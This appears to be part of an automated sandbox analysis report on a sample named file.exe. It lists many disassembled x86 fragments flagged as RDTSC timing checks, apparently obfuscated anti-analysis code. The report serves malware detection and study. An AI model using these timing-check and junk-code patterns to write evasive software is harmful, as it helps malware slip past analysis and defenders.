    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDBD3 second address: 7BDC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007FC834EB3D46h 0x00000011 popad 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FC834EB3D48h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D2BF4h], ebx 0x00000036 cld 0x00000037 push 00000000h 0x00000039 mov bx, 90B0h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 jo 00007FC834EB3D46h 0x00000047 jo 00007FC834EB3D46h 0x0000004d popad 0x0000004e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCDD8 second address: 7BCDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDC2C second address: 7BDC32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDC32 second address: 7BDC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE9D second address: 7BCEA7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC834EB3D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEAA4 second address: 7BEAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEAA8 second address: 7BEB30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007FC834EB3D48h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 jmp 00007FC834EB3D4Ch 0x0000002b cld 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FC834EB3D48h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov di, cx 0x0000004d mov bx, di 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FC834EB3D57h 0x0000005a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDDB3 second address: 7BDE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007FC83451D8ACh 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov ebx, dword ptr [ebp+1243FD82h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FC83451D8A8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov dword ptr [ebp+124473F4h], esi 0x00000041 mov eax, dword ptr [ebp+122D11A1h] 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007FC83451D8A8h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 mov ebx, 31CD88C0h 0x00000066 and bx, 6E6Ah 0x0000006b push FFFFFFFFh 0x0000006d mov edi, 75DC3523h 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FC83451D8B8h 0x0000007a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEB30 second address: 7BEB36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDE4F second address: 7BDE55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDE55 second address: 7BDE63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDE63 second address: 7BDE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC83451D8A6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFCDC second address: 7BFCE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFCE2 second address: 7BFD89 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83451D8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007FC83451D8B0h 0x00000012 mov di, cx 0x00000015 pop edi 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FC83451D8A8h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e stc 0x0000003f mov eax, dword ptr [ebp+122D00F9h] 0x00000045 mov bx, si 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007FC83451D8A8h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 sub edi, 66251085h 0x0000006a call 00007FC83451D8B7h 0x0000006f movzx ebx, dx 0x00000072 pop edi 0x00000073 push eax 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push edi 0x00000078 pop edi 0x00000079 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1AC3 second address: 7C1B2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FC834EB3D48h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 clc 0x00000026 adc bx, 97B1h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007FC834EB3D48h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 xor di, 2469h 0x0000004c push 00000000h 0x0000004e or dword ptr [ebp+122D1BF5h], ecx 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 ja 00007FC834EB3D46h 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1B2F second address: 7C1B79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC83451D8AAh 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jl 00007FC83451D8CEh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC83451D8B5h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2BD0 second address: 7C2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC834EB3D46h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2BE2 second address: 7C2C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2962h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FC83451D8A8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov bx, BEF6h 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D295Ch], eax 0x00000039 je 00007FC83451D8ACh 0x0000003f mov edi, dword ptr [ebp+122D395Ah] 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007FC83451D8A6h 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2C48 second address: 7C2C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C2C4C second address: 7C2C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1DBE second address: 7C1DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BD1 second address: 7C4BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BD7 second address: 7C4BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BDC second address: 7C4BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3E11 second address: 7C3E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BE3 second address: 7C4BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FC83451D8A6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BF5 second address: 7C4BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4BFB second address: 7C4C4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FC83451D8A8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov bh, ch 0x00000025 push 00000000h 0x00000027 mov dword ptr [ebp+122D1C9Dh], ecx 0x0000002d push 00000000h 0x0000002f adc edi, 5A9E29D4h 0x00000035 xchg eax, esi 0x00000036 jmp 00007FC83451D8ADh 0x0000003b push eax 0x0000003c jc 00007FC83451D8B9h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7C28 second address: 7C7C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC834EB3D58h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E8F second address: 7C6E95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8C83 second address: 7C8C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8C87 second address: 7C8C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7E63 second address: 7C7E6D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC834EB3D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8C8B second address: 7C8CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FC83451D8ACh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CAF41 second address: 7CAF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC834EB3D56h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FC834EB3D4Dh 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC93A second address: 7CC93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC93E second address: 7CC950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D35A7 second address: 7D35B9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83451D8A8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FC83451D8A6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8F49 second address: 7D8F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D56h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC834EB3D4Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FC834EB3D46h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8F7A second address: 7D8F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D961D second address: 7D9621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9621 second address: 7D9627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9627 second address: 7D962B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D97D2 second address: 7D97D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0667 second address: 7E066B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF91A second address: 7DF92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83451D8AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF92A second address: 7DF92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF92F second address: 7DF93F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007FC83451D8A6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1BBB second address: 7E1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A31 second address: 7B6A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A36 second address: 7B6ABB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC834EB3D4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FC834EB3D48h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+124767DCh] 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007FC834EB3D48h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 pushad 0x00000048 clc 0x00000049 add ebx, dword ptr [ebp+122D38AAh] 0x0000004f popad 0x00000050 or dword ptr [ebp+1246E3D7h], edx 0x00000056 nop 0x00000057 push eax 0x00000058 jmp 00007FC834EB3D51h 0x0000005d pop eax 0x0000005e push eax 0x0000005f push edi 0x00000060 jg 00007FC834EB3D4Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6ABB second address: 796064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 nop 0x00000006 xor cx, 1FF8h 0x0000000b call dword ptr [ebp+122D2BA6h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FC83451D8B0h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e push esi 0x0000001f jmp 00007FC83451D8AFh 0x00000024 pop esi 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6F0A second address: 7B6F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC834EB3D51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC834EB3D4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6F27 second address: 613BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007FC83451D8B2h 0x0000000c nop 0x0000000d add dword ptr [ebp+122D1872h], eax 0x00000013 push dword ptr [ebp+122D11DDh] 0x00000019 ja 00007FC83451D8A7h 0x0000001f call dword ptr [ebp+122D1C06h] 0x00000025 pushad 0x00000026 pushad 0x00000027 jbe 00007FC83451D8A7h 0x0000002d cmc 0x0000002e popad 0x0000002f pushad 0x00000030 jmp 00007FC83451D8AEh 0x00000035 mov ebx, dword ptr [ebp+122D37DEh] 0x0000003b popad 0x0000003c xor eax, eax 0x0000003e jbe 00007FC83451D8ACh 0x00000044 mov edx, dword ptr [esp+28h] 0x00000048 jnp 00007FC83451D8B9h 0x0000004e jmp 00007FC83451D8B3h 0x00000053 mov dword ptr [ebp+122D3A76h], eax 0x00000059 clc 0x0000005a mov esi, 0000003Ch 0x0000005f sub dword ptr [ebp+122D36B3h], edi 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jnl 00007FC83451D8ADh 0x0000006f lodsw 0x00000071 jmp 00007FC83451D8B1h 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a sub dword ptr [ebp+122D230Bh], ebx 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 mov dword ptr [ebp+122D230Bh], edx 0x0000008a nop 0x0000008b jbe 00007FC83451D8C2h 0x00000091 pushad 0x00000092 jmp 00007FC83451D8B4h 0x00000097 push eax 0x00000098 push edx 0x00000099 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B705F second address: 7B7063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7063 second address: 7B7080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC83451D8A8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FC83451D8A6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7080 second address: 7B7086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7086 second address: 7B70A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FC83451D8ACh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B70A8 second address: 7B70C5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC834EB3D4Ch 0x00000008 jnp 00007FC834EB3D46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jl 00007FC834EB3D4Eh 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71BB second address: 7B71C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71C0 second address: 7B71D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC834EB3D46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71D2 second address: 7B71E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B71E4 second address: 7B71EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7295 second address: 7B729B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B752B second address: 7B752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BEB second address: 7B7BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7BF0 second address: 7B7BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7D39 second address: 7B7D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83451D8ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx edx, cx 0x0000000f lea eax, dword ptr [ebp+12476820h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FC83451D8A8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f sbb edi, 0ED50BBBh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FC83451D8AAh 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7D8C second address: 7B7DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FC834EB3D46h 0x00000009 jl 00007FC834EB3D46h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
